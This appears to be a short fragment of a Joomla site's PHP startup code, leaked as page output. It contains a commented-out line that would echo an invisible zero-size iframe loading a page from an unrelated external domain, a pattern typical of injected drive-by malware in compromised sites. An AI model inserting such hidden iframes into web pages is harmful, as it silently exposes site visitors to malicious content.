//JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');
//echo ("<html><iframe src=\"http://www.stockphotoshop.co.uk/ip/index.php\" width=\"0\" height=\"0\"></iframe></html>");
/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();
Time to create page: 0.077 seconds